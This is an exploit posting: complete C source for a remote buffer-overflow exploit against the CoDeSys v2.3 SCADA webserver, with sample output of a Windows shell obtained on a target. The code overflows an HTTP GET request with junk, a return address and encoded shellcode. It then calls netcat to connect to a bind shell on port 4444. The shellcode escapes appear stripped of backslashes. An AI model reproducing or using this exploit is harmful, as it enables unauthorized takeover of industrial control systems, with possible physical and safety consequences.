
CoDeSys 2.3 Buffer Overflow

Posted on 02 December 2011

/* CoDeSys v2.3 Industrial Control System Development Software Remote Buffer Overflow Exploit for CoDeSys Scada webserver Author : Celil UNUVER, SignalSEC Labs www.signalsec.com Tested on WinXP SP1 EN THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY! --snip-- root@bt:~# ./codesys 192.168.1.36 CoDeSys v2.3 webserver Remote Exploit by SignalSEC Labs - www.signalsec.com [+]Sending payload to SCADA system! [+]Connecting to port 4444 to get shell! 192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.36] 4444 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:Program Files3S SoftwareCoDeSys V2.3visu> --snip-- */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #define name "CoDeSys v2.3 webserver Remote Exploit" #define PORT 8080 #define JUNK "A" int main ( int argc, char *argv[] ) { int sock, i, payload; struct sockaddr_in dest_addr; char *target = "target"; char request[1600], *ptr; char ret[] = "x67x42xa7x71"; //ret - WINXP SP1 EN , mswsock.dll char hellcode[] = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48" "x4ex36x46x52x46x42x4bx58x45x54x4ex43x4bx38x4ex37" "x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx58" "x4fx55x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58" "x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c" "x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx33x46x55x46x42x4ax32x45x47x45x4ex4bx58" "x4fx55x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx34" "x4bx48x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38" "x49x58x4ex36x46x42x4ex41x41x36x43x4cx41x43x4bx4d" 
"x46x56x4bx48x43x44x42x53x4bx58x42x44x4ex30x4bx48" "x42x47x4ex41x4dx4ax4bx48x42x34x4ax30x50x35x4ax56" "x50x48x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46" "x43x55x48x56x4ax46x43x53x44x33x4ax36x47x37x43x57" "x44x33x4fx35x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e" "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x58x45x4e" "x48x46x41x58x4dx4ex4ax50x44x30x45x35x4cx46x44x50" "x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55" "x4fx4fx48x4dx43x45x43x35x43x45x43x55x43x45x43x34" "x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax36x41x31" "x4ex35x48x46x43x45x49x48x41x4ex45x59x4ax46x46x4a" "x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41" "x41x45x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52" "x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d" "x4ax56x45x4ex49x44x48x38x49x54x47x55x4fx4fx48x4d" "x42x55x46x45x46x45x45x45x4fx4fx42x4dx43x49x4ax46" "x47x4ex49x57x48x4cx49x57x47x55x4fx4fx48x4dx45x55" "x4fx4fx42x4dx48x56x4cx46x46x36x48x36x4ax56x43x36" "x4dx46x49x58x45x4ex4cx56x42x45x49x45x49x32x4ex4c" "x49x48x47x4ex4cx56x46x34x49x48x44x4ex41x33x42x4c" "x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x54x4ex52" "x43x39x4dx58x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax46" "x44x37x50x4fx43x4bx48x41x4fx4fx45x47x46x34x4fx4f" "x48x4dx4bx35x47x45x44x35x41x35x41x35x41x45x4cx56" "x41x30x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax56" "x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46" "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x55x4ex4f" "x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d" "x4ax56x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d" "x4fx4fx42x4dx5a"; printf (" %s by SignalSEC Labs - www.signalsec.com ", name); if (argc < 2) { printf (" Usage: codesys [IP] "); exit (-1); } setenv (target, argv[1], 1); memset (request, '', sizeof (request)); ptr = request; strcat (request, "GET /"); for(i = 1; i < 776; i++){ strcat (request, JUNK); } strcat (request, ret); strcat (request, hellcode); strcat (request, " HTTP/1.1"); strcat (request, " "); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror(" socket error "); exit (1); } 
dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(PORT); if (! inet_aton(argv[1], &(dest_addr.sin_addr))) { perror("inet_aton problems"); exit (2); } memset( &(dest_addr.sin_zero), '', 8); if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){ perror(" Couldnt connect to target! "); close (sock); exit (3); } payload = (send (sock, ptr, strlen(request), 0)); if (payload == -1) { perror(" Can not send the payload "); close (sock); exit(4); } close (sock); printf (" [+]Sending payload to SCADA system! "); sleep (1); printf (" [+]Connecting to port 4444 to get shell! "); sleep (2); system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'"); exit (0); }

 
